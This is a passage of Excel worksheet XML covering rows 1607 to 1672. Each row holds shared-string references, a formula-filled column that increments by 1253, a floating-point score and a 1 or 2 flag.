        <v>12.4535665512085</v>
      </c>
      <c r="F1607">
        <v>2</v>
      </c>
    </row>
    <row r="1608" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1608" t="s">
        <v>3098</v>
      </c>
      <c r="B1608" t="s">
        <v>3099</v>
      </c>
      <c r="C1608">
        <f t="shared" si="24"/>
        <v>11443759</v>
      </c>
      <c r="D1608" t="s">
        <v>3100</v>
      </c>
      <c r="E1608">
        <v>31.58078575134277</v>
      </c>
      <c r="F1608">
        <v>1</v>
      </c>
    </row>
    <row r="1609" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1609" t="s">
        <v>3098</v>
      </c>
      <c r="B1609" t="s">
        <v>3099</v>
      </c>
      <c r="C1609">
        <f t="shared" si="24"/>
        <v>11445012</v>
      </c>
      <c r="D1609" t="s">
        <v>3101</v>
      </c>
      <c r="E1609">
        <v>3.9782989025115971</v>
      </c>
      <c r="F1609">
        <v>2</v>
      </c>
    </row>
    <row r="1610" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1610" t="s">
        <v>3102</v>
      </c>
      <c r="B1610" t="s">
        <v>3103</v>
      </c>
      <c r="C1610">
        <f t="shared" ref="C1610:C1673" si="25">C1609+1253</f>
        <v>11446265</v>
      </c>
      <c r="D1610" t="s">
        <v>3104</v>
      </c>
      <c r="E1610">
        <v>25.52973747253418</v>
      </c>
      <c r="F1610">
        <v>1</v>
      </c>
    </row>
    <row r="1611" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1611" t="s">
        <v>3102</v>
      </c>
      <c r="B1611" t="s">
        <v>3103</v>
      </c>
      <c r="C1611">
        <f t="shared" si="25"/>
        <v>11447518</v>
      </c>
      <c r="D1611" t="s">
        <v>3105</v>
      </c>
      <c r="E1611">
        <v>10.788044929504389</v>
      </c>
      <c r="F1611">
        <v>2</v>
      </c>
    </row>
    <row r="1612" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1612" t="s">
        <v>3106</v>
      </c>
      <c r="B1612" t="s">
        <v>3107</v>
      </c>
      <c r="C1612">
        <f t="shared" si="25"/>
        <v>11448771</v>
      </c>
      <c r="D1612" t="s">
        <v>3108</v>
      </c>
      <c r="E1612">
        <v>23.820772171020511</v>
      </c>
      <c r="F1612">
        <v>1</v>
      </c>
    </row>
    <row r="1613" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1613" t="s">
        <v>3106</v>
      </c>
      <c r="B1613" t="s">
        <v>3107</v>
      </c>
      <c r="C1613">
        <f t="shared" si="25"/>
        <v>11450024</v>
      </c>
      <c r="D1613" t="s">
        <v>3109</v>
      </c>
      <c r="E1613">
        <v>14.821126937866209</v>
      </c>
      <c r="F1613">
        <v>2</v>
      </c>
    </row>
    <row r="1614" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1614" t="s">
        <v>3110</v>
      </c>
      <c r="B1614" t="s">
        <v>3111</v>
      </c>
      <c r="C1614">
        <f t="shared" si="25"/>
        <v>11451277</v>
      </c>
      <c r="D1614" t="s">
        <v>3112</v>
      </c>
      <c r="E1614">
        <v>20.195381164550781</v>
      </c>
      <c r="F1614">
        <v>1</v>
      </c>
    </row>
    <row r="1615" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1615" t="s">
        <v>3110</v>
      </c>
      <c r="B1615" t="s">
        <v>3111</v>
      </c>
      <c r="C1615">
        <f t="shared" si="25"/>
        <v>11452530</v>
      </c>
      <c r="D1615" t="s">
        <v>3113</v>
      </c>
      <c r="E1615">
        <v>10.739216804504389</v>
      </c>
      <c r="F1615">
        <v>2</v>
      </c>
    </row>
    <row r="1616" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1616" t="s">
        <v>3114</v>
      </c>
      <c r="B1616" t="s">
        <v>3115</v>
      </c>
      <c r="C1616">
        <f t="shared" si="25"/>
        <v>11453783</v>
      </c>
      <c r="D1616" t="s">
        <v>3116</v>
      </c>
      <c r="E1616">
        <v>29.532871246337891</v>
      </c>
      <c r="F1616">
        <v>1</v>
      </c>
    </row>
    <row r="1617" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1617" t="s">
        <v>3114</v>
      </c>
      <c r="B1617" t="s">
        <v>3115</v>
      </c>
      <c r="C1617">
        <f t="shared" si="25"/>
        <v>11455036</v>
      </c>
      <c r="D1617" t="s">
        <v>3117</v>
      </c>
      <c r="E1617">
        <v>5.908076286315918</v>
      </c>
      <c r="F1617">
        <v>2</v>
      </c>
    </row>
    <row r="1618" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1618" t="s">
        <v>3118</v>
      </c>
      <c r="B1618" t="s">
        <v>3119</v>
      </c>
      <c r="C1618">
        <f t="shared" si="25"/>
        <v>11456289</v>
      </c>
      <c r="D1618" t="s">
        <v>3120</v>
      </c>
      <c r="E1618">
        <v>16.772006988525391</v>
      </c>
      <c r="F1618">
        <v>1</v>
      </c>
    </row>
    <row r="1619" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1619" t="s">
        <v>3118</v>
      </c>
      <c r="B1619" t="s">
        <v>3119</v>
      </c>
      <c r="C1619">
        <f t="shared" si="25"/>
        <v>11457542</v>
      </c>
      <c r="D1619" t="s">
        <v>3121</v>
      </c>
      <c r="E1619">
        <v>4.9596705436706543</v>
      </c>
      <c r="F1619">
        <v>2</v>
      </c>
    </row>
    <row r="1620" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1620" t="s">
        <v>3122</v>
      </c>
      <c r="B1620" t="s">
        <v>3123</v>
      </c>
      <c r="C1620">
        <f t="shared" si="25"/>
        <v>11458795</v>
      </c>
      <c r="D1620" t="s">
        <v>3124</v>
      </c>
      <c r="E1620">
        <v>29.120550155639648</v>
      </c>
      <c r="F1620">
        <v>1</v>
      </c>
    </row>
    <row r="1621" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1621" t="s">
        <v>3122</v>
      </c>
      <c r="B1621" t="s">
        <v>3123</v>
      </c>
      <c r="C1621">
        <f t="shared" si="25"/>
        <v>11460048</v>
      </c>
      <c r="D1621" t="s">
        <v>3125</v>
      </c>
      <c r="E1621">
        <v>6.7915863990783691</v>
      </c>
      <c r="F1621">
        <v>2</v>
      </c>
    </row>
    <row r="1622" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1622" t="s">
        <v>3126</v>
      </c>
      <c r="B1622" t="s">
        <v>3127</v>
      </c>
      <c r="C1622">
        <f t="shared" si="25"/>
        <v>11461301</v>
      </c>
      <c r="D1622" t="s">
        <v>3128</v>
      </c>
      <c r="E1622">
        <v>26.32313346862793</v>
      </c>
      <c r="F1622">
        <v>1</v>
      </c>
    </row>
    <row r="1623" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1623" t="s">
        <v>3126</v>
      </c>
      <c r="B1623" t="s">
        <v>3127</v>
      </c>
      <c r="C1623">
        <f t="shared" si="25"/>
        <v>11462554</v>
      </c>
      <c r="D1623" t="s">
        <v>3129</v>
      </c>
      <c r="E1623">
        <v>5.9311041831970206</v>
      </c>
      <c r="F1623">
        <v>2</v>
      </c>
    </row>
    <row r="1624" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1624" t="s">
        <v>3130</v>
      </c>
      <c r="B1624" t="s">
        <v>3131</v>
      </c>
      <c r="C1624">
        <f t="shared" si="25"/>
        <v>11463807</v>
      </c>
      <c r="D1624" t="s">
        <v>3132</v>
      </c>
      <c r="E1624">
        <v>18.354160308837891</v>
      </c>
      <c r="F1624">
        <v>1</v>
      </c>
    </row>
    <row r="1625" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1625" t="s">
        <v>3130</v>
      </c>
      <c r="B1625" t="s">
        <v>3131</v>
      </c>
      <c r="C1625">
        <f t="shared" si="25"/>
        <v>11465060</v>
      </c>
      <c r="D1625" t="s">
        <v>3133</v>
      </c>
      <c r="E1625">
        <v>0.88496124744415283</v>
      </c>
      <c r="F1625">
        <v>2</v>
      </c>
    </row>
    <row r="1626" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1626" t="s">
        <v>3134</v>
      </c>
      <c r="B1626" t="s">
        <v>3135</v>
      </c>
      <c r="C1626">
        <f t="shared" si="25"/>
        <v>11466313</v>
      </c>
      <c r="D1626" t="s">
        <v>3136</v>
      </c>
      <c r="E1626">
        <v>23.668521881103519</v>
      </c>
      <c r="F1626">
        <v>1</v>
      </c>
    </row>
    <row r="1627" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1627" t="s">
        <v>3134</v>
      </c>
      <c r="B1627" t="s">
        <v>3135</v>
      </c>
      <c r="C1627">
        <f t="shared" si="25"/>
        <v>11467566</v>
      </c>
      <c r="D1627" t="s">
        <v>3137</v>
      </c>
      <c r="E1627">
        <v>9.7047119140625</v>
      </c>
      <c r="F1627">
        <v>2</v>
      </c>
    </row>
    <row r="1628" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1628" t="s">
        <v>3138</v>
      </c>
      <c r="B1628" t="s">
        <v>3139</v>
      </c>
      <c r="C1628">
        <f t="shared" si="25"/>
        <v>11468819</v>
      </c>
      <c r="D1628" t="s">
        <v>3140</v>
      </c>
      <c r="E1628">
        <v>31.753555297851559</v>
      </c>
      <c r="F1628">
        <v>1</v>
      </c>
    </row>
    <row r="1629" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1629" t="s">
        <v>3138</v>
      </c>
      <c r="B1629" t="s">
        <v>3139</v>
      </c>
      <c r="C1629">
        <f t="shared" si="25"/>
        <v>11470072</v>
      </c>
      <c r="D1629" t="s">
        <v>3141</v>
      </c>
      <c r="E1629">
        <v>8.9556902647018433E-2</v>
      </c>
      <c r="F1629">
        <v>2</v>
      </c>
    </row>
    <row r="1630" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1630" t="s">
        <v>3142</v>
      </c>
      <c r="B1630" t="s">
        <v>3143</v>
      </c>
      <c r="C1630">
        <f t="shared" si="25"/>
        <v>11471325</v>
      </c>
      <c r="D1630" t="s">
        <v>3144</v>
      </c>
      <c r="E1630">
        <v>28.3241081237793</v>
      </c>
      <c r="F1630">
        <v>1</v>
      </c>
    </row>
    <row r="1631" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1631" t="s">
        <v>3142</v>
      </c>
      <c r="B1631" t="s">
        <v>3143</v>
      </c>
      <c r="C1631">
        <f t="shared" si="25"/>
        <v>11472578</v>
      </c>
      <c r="D1631" t="s">
        <v>3145</v>
      </c>
      <c r="E1631">
        <v>0.57511764764785767</v>
      </c>
      <c r="F1631">
        <v>2</v>
      </c>
    </row>
    <row r="1632" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1632" t="s">
        <v>3146</v>
      </c>
      <c r="B1632" t="s">
        <v>3147</v>
      </c>
      <c r="C1632">
        <f t="shared" si="25"/>
        <v>11473831</v>
      </c>
      <c r="D1632" t="s">
        <v>3148</v>
      </c>
      <c r="E1632">
        <v>24.087917327880859</v>
      </c>
      <c r="F1632">
        <v>1</v>
      </c>
    </row>
    <row r="1633" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1633" t="s">
        <v>3146</v>
      </c>
      <c r="B1633" t="s">
        <v>3147</v>
      </c>
      <c r="C1633">
        <f t="shared" si="25"/>
        <v>11475084</v>
      </c>
      <c r="D1633" t="s">
        <v>3149</v>
      </c>
      <c r="E1633">
        <v>4.5368828773498544</v>
      </c>
      <c r="F1633">
        <v>2</v>
      </c>
    </row>
    <row r="1634" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1634" t="s">
        <v>3150</v>
      </c>
      <c r="B1634" t="s">
        <v>3151</v>
      </c>
      <c r="C1634">
        <f t="shared" si="25"/>
        <v>11476337</v>
      </c>
      <c r="D1634" t="s">
        <v>3152</v>
      </c>
      <c r="E1634">
        <v>35.903984069824219</v>
      </c>
      <c r="F1634">
        <v>1</v>
      </c>
    </row>
    <row r="1635" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1635" t="s">
        <v>3150</v>
      </c>
      <c r="B1635" t="s">
        <v>3151</v>
      </c>
      <c r="C1635">
        <f t="shared" si="25"/>
        <v>11477590</v>
      </c>
      <c r="D1635" t="s">
        <v>3153</v>
      </c>
      <c r="E1635">
        <v>1.2160322666168211</v>
      </c>
      <c r="F1635">
        <v>2</v>
      </c>
    </row>
    <row r="1636" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1636" t="s">
        <v>3154</v>
      </c>
      <c r="B1636" t="s">
        <v>3155</v>
      </c>
      <c r="C1636">
        <f t="shared" si="25"/>
        <v>11478843</v>
      </c>
      <c r="D1636" t="s">
        <v>3156</v>
      </c>
      <c r="E1636">
        <v>32.575336456298828</v>
      </c>
      <c r="F1636">
        <v>1</v>
      </c>
    </row>
    <row r="1637" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1637" t="s">
        <v>3154</v>
      </c>
      <c r="B1637" t="s">
        <v>3155</v>
      </c>
      <c r="C1637">
        <f t="shared" si="25"/>
        <v>11480096</v>
      </c>
      <c r="D1637" t="s">
        <v>3157</v>
      </c>
      <c r="E1637">
        <v>8.5717010498046875</v>
      </c>
      <c r="F1637">
        <v>2</v>
      </c>
    </row>
    <row r="1638" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1638" t="s">
        <v>3158</v>
      </c>
      <c r="B1638" t="s">
        <v>3159</v>
      </c>
      <c r="C1638">
        <f t="shared" si="25"/>
        <v>11481349</v>
      </c>
      <c r="D1638" t="s">
        <v>3160</v>
      </c>
      <c r="E1638">
        <v>27.699558258056641</v>
      </c>
      <c r="F1638">
        <v>1</v>
      </c>
    </row>
    <row r="1639" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1639" t="s">
        <v>3158</v>
      </c>
      <c r="B1639" t="s">
        <v>3159</v>
      </c>
      <c r="C1639">
        <f t="shared" si="25"/>
        <v>11482602</v>
      </c>
      <c r="D1639" t="s">
        <v>3161</v>
      </c>
      <c r="E1639">
        <v>6.9301900863647461</v>
      </c>
      <c r="F1639">
        <v>2</v>
      </c>
    </row>
    <row r="1640" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1640" t="s">
        <v>3162</v>
      </c>
      <c r="B1640" t="s">
        <v>3163</v>
      </c>
      <c r="C1640">
        <f t="shared" si="25"/>
        <v>11483855</v>
      </c>
      <c r="D1640" t="s">
        <v>3164</v>
      </c>
      <c r="E1640">
        <v>27.318672180175781</v>
      </c>
      <c r="F1640">
        <v>1</v>
      </c>
    </row>
    <row r="1641" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1641" t="s">
        <v>3162</v>
      </c>
      <c r="B1641" t="s">
        <v>3163</v>
      </c>
      <c r="C1641">
        <f t="shared" si="25"/>
        <v>11485108</v>
      </c>
      <c r="D1641" t="s">
        <v>3165</v>
      </c>
      <c r="E1641">
        <v>0.59621113538742065</v>
      </c>
      <c r="F1641">
        <v>2</v>
      </c>
    </row>
    <row r="1642" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1642" t="s">
        <v>3166</v>
      </c>
      <c r="B1642" t="s">
        <v>3167</v>
      </c>
      <c r="C1642">
        <f t="shared" si="25"/>
        <v>11486361</v>
      </c>
      <c r="D1642" t="s">
        <v>3168</v>
      </c>
      <c r="E1642">
        <v>19.668266296386719</v>
      </c>
      <c r="F1642">
        <v>1</v>
      </c>
    </row>
    <row r="1643" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1643" t="s">
        <v>3166</v>
      </c>
      <c r="B1643" t="s">
        <v>3167</v>
      </c>
      <c r="C1643">
        <f t="shared" si="25"/>
        <v>11487614</v>
      </c>
      <c r="D1643" t="s">
        <v>3169</v>
      </c>
      <c r="E1643">
        <v>6.5845174789428711</v>
      </c>
      <c r="F1643">
        <v>2</v>
      </c>
    </row>
    <row r="1644" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1644" t="s">
        <v>3170</v>
      </c>
      <c r="B1644" t="s">
        <v>3171</v>
      </c>
      <c r="C1644">
        <f t="shared" si="25"/>
        <v>11488867</v>
      </c>
      <c r="D1644" t="s">
        <v>3172</v>
      </c>
      <c r="E1644">
        <v>34.294925689697273</v>
      </c>
      <c r="F1644">
        <v>1</v>
      </c>
    </row>
    <row r="1645" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1645" t="s">
        <v>3170</v>
      </c>
      <c r="B1645" t="s">
        <v>3171</v>
      </c>
      <c r="C1645">
        <f t="shared" si="25"/>
        <v>11490120</v>
      </c>
      <c r="D1645" t="s">
        <v>3173</v>
      </c>
      <c r="E1645">
        <v>4.9139742851257324</v>
      </c>
      <c r="F1645">
        <v>2</v>
      </c>
    </row>
    <row r="1646" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1646" t="s">
        <v>3174</v>
      </c>
      <c r="B1646" t="s">
        <v>3175</v>
      </c>
      <c r="C1646">
        <f t="shared" si="25"/>
        <v>11491373</v>
      </c>
      <c r="D1646" t="s">
        <v>3176</v>
      </c>
      <c r="E1646">
        <v>34.041362762451172</v>
      </c>
      <c r="F1646">
        <v>1</v>
      </c>
    </row>
    <row r="1647" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1647" t="s">
        <v>3174</v>
      </c>
      <c r="B1647" t="s">
        <v>3175</v>
      </c>
      <c r="C1647">
        <f t="shared" si="25"/>
        <v>11492626</v>
      </c>
      <c r="D1647" t="s">
        <v>3177</v>
      </c>
      <c r="E1647">
        <v>3.2036747932434082</v>
      </c>
      <c r="F1647">
        <v>2</v>
      </c>
    </row>
    <row r="1648" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1648" t="s">
        <v>3178</v>
      </c>
      <c r="B1648" t="s">
        <v>3179</v>
      </c>
      <c r="C1648">
        <f t="shared" si="25"/>
        <v>11493879</v>
      </c>
      <c r="D1648" t="s">
        <v>3180</v>
      </c>
      <c r="E1648">
        <v>23.085714340209961</v>
      </c>
      <c r="F1648">
        <v>1</v>
      </c>
    </row>
    <row r="1649" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1649" t="s">
        <v>3178</v>
      </c>
      <c r="B1649" t="s">
        <v>3179</v>
      </c>
      <c r="C1649">
        <f t="shared" si="25"/>
        <v>11495132</v>
      </c>
      <c r="D1649" t="s">
        <v>3181</v>
      </c>
      <c r="E1649">
        <v>13.272629737854</v>
      </c>
      <c r="F1649">
        <v>2</v>
      </c>
    </row>
    <row r="1650" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1650" t="s">
        <v>3182</v>
      </c>
      <c r="B1650" t="s">
        <v>3183</v>
      </c>
      <c r="C1650">
        <f t="shared" si="25"/>
        <v>11496385</v>
      </c>
      <c r="D1650" t="s">
        <v>3184</v>
      </c>
      <c r="E1650">
        <v>23.57551383972168</v>
      </c>
      <c r="F1650">
        <v>1</v>
      </c>
    </row>
    <row r="1651" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1651" t="s">
        <v>3182</v>
      </c>
      <c r="B1651" t="s">
        <v>3183</v>
      </c>
      <c r="C1651">
        <f t="shared" si="25"/>
        <v>11497638</v>
      </c>
      <c r="D1651" t="s">
        <v>3185</v>
      </c>
      <c r="E1651">
        <v>2.0180172920227051</v>
      </c>
      <c r="F1651">
        <v>2</v>
      </c>
    </row>
    <row r="1652" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1652" t="s">
        <v>3186</v>
      </c>
      <c r="B1652" t="s">
        <v>3187</v>
      </c>
      <c r="C1652">
        <f t="shared" si="25"/>
        <v>11498891</v>
      </c>
      <c r="D1652" t="s">
        <v>3188</v>
      </c>
      <c r="E1652">
        <v>23.0425910949707</v>
      </c>
      <c r="F1652">
        <v>1</v>
      </c>
    </row>
    <row r="1653" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1653" t="s">
        <v>3186</v>
      </c>
      <c r="B1653" t="s">
        <v>3187</v>
      </c>
      <c r="C1653">
        <f t="shared" si="25"/>
        <v>11500144</v>
      </c>
      <c r="D1653" t="s">
        <v>3189</v>
      </c>
      <c r="E1653">
        <v>5.261836051940918</v>
      </c>
      <c r="F1653">
        <v>2</v>
      </c>
    </row>
    <row r="1654" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1654" t="s">
        <v>3190</v>
      </c>
      <c r="B1654" t="s">
        <v>3191</v>
      </c>
      <c r="C1654">
        <f t="shared" si="25"/>
        <v>11501397</v>
      </c>
      <c r="D1654" t="s">
        <v>3192</v>
      </c>
      <c r="E1654">
        <v>32.513545989990227</v>
      </c>
      <c r="F1654">
        <v>1</v>
      </c>
    </row>
    <row r="1655" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1655" t="s">
        <v>3190</v>
      </c>
      <c r="B1655" t="s">
        <v>3191</v>
      </c>
      <c r="C1655">
        <f t="shared" si="25"/>
        <v>11502650</v>
      </c>
      <c r="D1655" t="s">
        <v>3193</v>
      </c>
      <c r="E1655">
        <v>7.0723099708557129</v>
      </c>
      <c r="F1655">
        <v>2</v>
      </c>
    </row>
    <row r="1656" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1656" t="s">
        <v>3194</v>
      </c>
      <c r="B1656" t="s">
        <v>3195</v>
      </c>
      <c r="C1656">
        <f t="shared" si="25"/>
        <v>11503903</v>
      </c>
      <c r="D1656" t="s">
        <v>3196</v>
      </c>
      <c r="E1656">
        <v>23.314067840576168</v>
      </c>
      <c r="F1656">
        <v>1</v>
      </c>
    </row>
    <row r="1657" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1657" t="s">
        <v>3194</v>
      </c>
      <c r="B1657" t="s">
        <v>3195</v>
      </c>
      <c r="C1657">
        <f t="shared" si="25"/>
        <v>11505156</v>
      </c>
      <c r="D1657" t="s">
        <v>3197</v>
      </c>
      <c r="E1657">
        <v>2.5598008632659912</v>
      </c>
      <c r="F1657">
        <v>2</v>
      </c>
    </row>
    <row r="1658" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1658" t="s">
        <v>3198</v>
      </c>
      <c r="B1658" t="s">
        <v>3199</v>
      </c>
      <c r="C1658">
        <f t="shared" si="25"/>
        <v>11506409</v>
      </c>
      <c r="D1658" t="s">
        <v>3200</v>
      </c>
      <c r="E1658">
        <v>30.80171966552734</v>
      </c>
      <c r="F1658">
        <v>1</v>
      </c>
    </row>
    <row r="1659" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1659" t="s">
        <v>3198</v>
      </c>
      <c r="B1659" t="s">
        <v>3199</v>
      </c>
      <c r="C1659">
        <f t="shared" si="25"/>
        <v>11507662</v>
      </c>
      <c r="D1659" t="s">
        <v>3201</v>
      </c>
      <c r="E1659">
        <v>10.02064323425293</v>
      </c>
      <c r="F1659">
        <v>2</v>
      </c>
    </row>
    <row r="1660" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1660" t="s">
        <v>3202</v>
      </c>
      <c r="B1660" t="s">
        <v>3203</v>
      </c>
      <c r="C1660">
        <f t="shared" si="25"/>
        <v>11508915</v>
      </c>
      <c r="D1660" t="s">
        <v>3204</v>
      </c>
      <c r="E1660">
        <v>23.085504531860352</v>
      </c>
      <c r="F1660">
        <v>1</v>
      </c>
    </row>
    <row r="1661" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1661" t="s">
        <v>3202</v>
      </c>
      <c r="B1661" t="s">
        <v>3203</v>
      </c>
      <c r="C1661">
        <f t="shared" si="25"/>
        <v>11510168</v>
      </c>
      <c r="D1661" t="s">
        <v>3205</v>
      </c>
      <c r="E1661">
        <v>8.3651361465454102</v>
      </c>
      <c r="F1661">
        <v>2</v>
      </c>
    </row>
    <row r="1662" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1662" t="s">
        <v>3206</v>
      </c>
      <c r="B1662" t="s">
        <v>3207</v>
      </c>
      <c r="C1662">
        <f t="shared" si="25"/>
        <v>11511421</v>
      </c>
      <c r="D1662" t="s">
        <v>3208</v>
      </c>
      <c r="E1662">
        <v>27.94522666931152</v>
      </c>
      <c r="F1662">
        <v>1</v>
      </c>
    </row>
    <row r="1663" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1663" t="s">
        <v>3206</v>
      </c>
      <c r="B1663" t="s">
        <v>3207</v>
      </c>
      <c r="C1663">
        <f t="shared" si="25"/>
        <v>11512674</v>
      </c>
      <c r="D1663" t="s">
        <v>3209</v>
      </c>
      <c r="E1663">
        <v>6.9727306365966797</v>
      </c>
      <c r="F1663">
        <v>2</v>
      </c>
    </row>
    <row r="1664" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1664" t="s">
        <v>3210</v>
      </c>
      <c r="B1664" t="s">
        <v>3211</v>
      </c>
      <c r="C1664">
        <f t="shared" si="25"/>
        <v>11513927</v>
      </c>
      <c r="D1664" t="s">
        <v>3212</v>
      </c>
      <c r="E1664">
        <v>15.473531723022459</v>
      </c>
      <c r="F1664">
        <v>1</v>
      </c>
    </row>
    <row r="1665" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1665" t="s">
        <v>3210</v>
      </c>
      <c r="B1665" t="s">
        <v>3211</v>
      </c>
      <c r="C1665">
        <f t="shared" si="25"/>
        <v>11515180</v>
      </c>
      <c r="D1665" t="s">
        <v>3213</v>
      </c>
      <c r="E1665">
        <v>2.1700196266174321</v>
      </c>
      <c r="F1665">
        <v>2</v>
      </c>
    </row>
    <row r="1666" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1666" t="s">
        <v>3214</v>
      </c>
      <c r="B1666" t="s">
        <v>3215</v>
      </c>
      <c r="C1666">
        <f t="shared" si="25"/>
        <v>11516433</v>
      </c>
      <c r="D1666" t="s">
        <v>3216</v>
      </c>
      <c r="E1666">
        <v>21.361757278442379</v>
      </c>
      <c r="F1666">
        <v>1</v>
      </c>
    </row>
    <row r="1667" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1667" t="s">
        <v>3214</v>
      </c>
      <c r="B1667" t="s">
        <v>3215</v>
      </c>
      <c r="C1667">
        <f t="shared" si="25"/>
        <v>11517686</v>
      </c>
      <c r="D1667" t="s">
        <v>3217</v>
      </c>
      <c r="E1667">
        <v>2.000871896743774</v>
      </c>
      <c r="F1667">
        <v>2</v>
      </c>
    </row>
    <row r="1668" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1668" t="s">
        <v>3218</v>
      </c>
      <c r="B1668" t="s">
        <v>3219</v>
      </c>
      <c r="C1668">
        <f t="shared" si="25"/>
        <v>11518939</v>
      </c>
      <c r="D1668" t="s">
        <v>3220</v>
      </c>
      <c r="E1668">
        <v>28.541349411010739</v>
      </c>
      <c r="F1668">
        <v>1</v>
      </c>
    </row>
    <row r="1669" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1669" t="s">
        <v>3218</v>
      </c>
      <c r="B1669" t="s">
        <v>3219</v>
      </c>
      <c r="C1669">
        <f t="shared" si="25"/>
        <v>11520192</v>
      </c>
      <c r="D1669" t="s">
        <v>3221</v>
      </c>
      <c r="E1669">
        <v>6.1069674491882324</v>
      </c>
      <c r="F1669">
        <v>2</v>
      </c>
    </row>
    <row r="1670" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1670" t="s">
        <v>3222</v>
      </c>
      <c r="B1670" t="s">
        <v>923</v>
      </c>
      <c r="C1670">
        <f t="shared" si="25"/>
        <v>11521445</v>
      </c>
      <c r="D1670" t="s">
        <v>924</v>
      </c>
      <c r="E1670">
        <v>36.286247253417969</v>
      </c>
      <c r="F1670">
        <v>1</v>
      </c>
    </row>
    <row r="1671" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1671" t="s">
        <v>3222</v>
      </c>
      <c r="B1671" t="s">
        <v>923</v>
      </c>
      <c r="C1671">
        <f t="shared" si="25"/>
        <v>11522698</v>
      </c>
      <c r="D1671" t="s">
        <v>3223</v>
      </c>
      <c r="E1671">
        <v>5.8626971244812012</v>
      </c>
      <c r="F1671">
        <v>2</v>
      </c>
    </row>
    <row r="1672" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1672" t="s">
        <v>3224</v>
      </c>
      <c r="B1672" t="s">
        <v>3225</v>
      </c>
      <c r="C1672">
        <f t="shared" si="25"/>
        <v>11523951</v>
      </c>
      <c r="D1672" t="s">
        <v>3226</v>
      </c>
      <c r="E1672">
